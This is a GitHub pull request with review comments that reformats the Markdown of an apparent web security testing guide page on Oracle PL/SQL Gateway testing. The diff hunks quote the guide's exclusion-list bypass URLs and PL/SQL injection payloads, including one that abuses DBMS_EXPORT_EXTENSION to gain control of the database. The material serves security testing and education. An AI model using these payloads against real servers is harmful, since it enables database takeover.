### PR TITLE
4.8.5.1 - v4 Migration Cleanup

### PR DESCRIPTION
**Pull request by rejahrehim**
This PR part of issue #84.

- [ ] This PR handles the issue and requires no additional PRs.
- [x] You have validated the need for this change.

**What did this PR accomplish?**

- Fix links
- Fix linting

### CODE REVIEW

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md [hunk 1]
```diff
@@ -1,122 +1,126 @@
...
 
 `http://www.server.com/aaa/bbb/xxxxx.yyyyy`
 
-If xxxxx.yyyyy were replaced with something along the lines of “ebank.home,” “store.welcome,” “auth.login,” or “books.search,” then there’s a fairly strong chance that the PL/SQL Gateway is being used. It is also possible to precede the requested package and procedure with the name of the user that owns it - i.e. the schema - in this case the user is “webuser”:
+If `xxxxx.yyyyy` were replaced with something along the lines of `ebank.home,` `store.welcome,` `auth.login,` or `books.search,` then there’s a fairly strong chance that the PL/SQL Gateway is being used. It is also possible to precede the requested package and procedure with the name of the user that owns it - i.e. the schema - in this case the user is `webuser`:
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md]: Put the commas outside the backticks. They are not part of the actual values. Haha

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md [hunk 2]
```diff
@@ -1,122 +1,126 @@
...
-We can use this to test if the server is running the PL/SQL Gateway. Simply take the DAD and append NULL, then append NOSUCHPROC:
-
-`http://www.example.com/pls/dad/null`\
-`http://www.example.com/pls/dad/nosuchproc`
-
-If the server responds with a 200 OK response for the first and a 404 Not Found for the second then it indicates that the server is running the PL/SQL Gateway.
-
-**Known package access**\
-On older versions of the PL/SQL Gateway, it is possible to directly access the packages that form the PL/SQL Web Toolkit such as the OWA and HTP packages. One of these packages is the OWA\_UTIL package, which we'll speak about more later on. This package contains a procedure called SIGNATURE and it simply outputs in HTML a PL/SQL signature. Thus requesting
+- `Oracle-Application-Server-10g`
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md]: How about you put all of them in one triple backticks?

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md [hunk 3]
```diff
@@ -1,122 +1,126 @@
...
+- `Oracle_Web_Listener/4.0.8.1.0EnterpriseEdition`
+- `Oracle_Web_listener3.0.2.0.0/2.14FC1`
+- `Oracle9iAS/9.0.2 Oracle HTTP Server`
+- `Oracle9iAS/9.0.3.1 Oracle HTTP Server`
+
+#### The NULL Test
+
+In PL/SQL, `null` is a perfectly acceptable expression:
+
+- `SQL> BEGIN`
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md]: Same for these, setting them in a combined manner is better.

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md [hunk 4]
```diff
@@ -1,122 +1,126 @@
...
+#### Known Package Access
+
+On older versions of the PL/SQL Gateway, it is possible to directly access the packages that form the PL/SQL Web Toolkit such as the OWA and HTP packages. One of these packages is the `OWA_UTIL` package, which we'll speak about more later on. This package contains a procedure called SIGNATURE and it simply outputs in HTML a PL/SQL signature. Thus requesting
 
 `http://www.example.com/pls/dad/owa_util.signature`
 
 returns the following output on the webpage
 
-“`This`` ``page`` ``was`` ``produced`` ``by`` ``the`` ``PL/SQL`` ``Web`` ``Toolkit`` ``on`` ``date`”
+`This`` ``page`` ``was`` ``produced`` ``by`` ``the`` ``PL/SQL`` ``Web`` ``Toolkit`` ``on`` ``date`
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md]: This is how these lines should look like 😄 
image

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md [hunk 5]
```diff
@@ -1,122 +1,126 @@
...
-`PORTAL30_SSO`\
-`TEST`\
-`DAD`\
-`APP`\
-`ONLINE`\
-`DB`\
-`OWA`
-
-**Determining if the PL/SQL Gateway is running**\
+- `SIMPLEDAD`
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md]: Put these in triple backticks

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md [hunk 6]
```diff
@@ -126,168 +130,176 @@ This will return a blank HTML page with a 200 OK response if the database server
...
+
+### Bypassing the Exclusion List - Method 1
 
-**Bypassing the Exclusion List - Method 1**\
 When Oracle first introduced the PL/SQL Exclusion List to prevent attackers from accessing arbitrary PL/SQL packages, it could be trivially bypassed by preceding the name of the schema/package with a hex encoded newline character or space or tab:
 
-`http://www.example.com/pls/dad/%0ASYS.PACKAGE.PROC`\
-`http://www.example.com/pls/dad/%20SYS.PACKAGE.PROC`\
-`http://www.example.com/pls/dad/%09SYS.PACKAGE.PROC`
+- `http://www.example.com/pls/dad/%0ASYS.PACKAGE.PROC`
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md]: Triple backticks please

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md [hunk 7]
```diff
@@ -126,168 +130,176 @@ This will return a blank HTML page with a 200 OK response if the database server
...
-`34    orasso.wpg_session.deinit();`\
-`35    null;`\
-`36    null;`\
-`37    commit;`\
-`38    owa.get_page(:data__,:ndata__);`\
-`39   end if;`\
-`40  end if;`\
-`41  :rc__ := rc__;`\
-`42  :db_proc_time__ := dbms_utility.get_time—start_time__;`\
+`1 declare`
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md]: Triple backticks please

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md [hunk 8]
```diff
@@ -126,168 +130,176 @@ This will return a blank HTML page with a 200 OK response if the database server
...
 
-`..`\
-`18  simple_list__(7) := 'htf.%';`\
-`19  if ((owa_match.match_pattern('inject'point', simple_list__, complex_list__, true))) then`\
-`20   rc__ := 2;`\
-`21  else`\
-`22   null;`\
-`23   orasso.wpg_session.init();`\
-`24   inject'point;`\
+`..`
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md]: Triple backticks please

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md [hunk 9]
```diff
@@ -126,168 +130,176 @@ This will return a blank HTML page with a 200 OK response if the database server
...
 
 Note the presence of FOO in the attacker’s query string. Attackers can abuse this to run arbitrary SQL. First, they need to close the brackets:
 
 `http://server.example.com/pls/dad/orasso.home?);--=BAR`
 
 This results in the following PL/SQL being executed:
 
-`..`\
-`orasso.home();--=>:);--);`\
+`..`
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md]: Triple backticks please

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md [hunk 10]
```diff
@@ -126,168 +130,176 @@ This will return a blank HTML page with a 200 OK response if the database server
...
+Note that the output won’t be displayed. This can be leveraged to exploit any PL/SQL injection bugs owned by SYS, thus enabling an attacker to gain complete control of the backend database server. For example, the following URL takes advantage of the SQL injection flaws in `DBMS_EXPORT_EXTENSION`
 
-`http://www.example.com/pls/dad/orasso.home?);`\
-` execute%20immediate%20:1;--=DECLARE%20BUF%20VARCHAR2(2000);%20BEGIN%20`\
-` BUF:=SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES`\
-` ('INDEX_NAME','INDEX_SCHEMA','DBMS_OUTPUT.PUT_LINE(:p1);`\
-` EXECUTE%20IMMEDIATE%20''CREATE%20OR%20REPLACE%20`\
-` PUBLIC%20SYNONYM%20BREAKABLE%20FOR%20SYS.OWA_UTIL'';`\
-` END;--','SYS',1,'VER',0);END;`
+- `http://www.example.com/pls/dad/orasso.home?);`
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.1_Testing_for_Oracle.md]: Triple backticks please

**Comment by rejahrehim** [comment]
@ThunderSon Fixed. Please recheck all

**Pull request merged**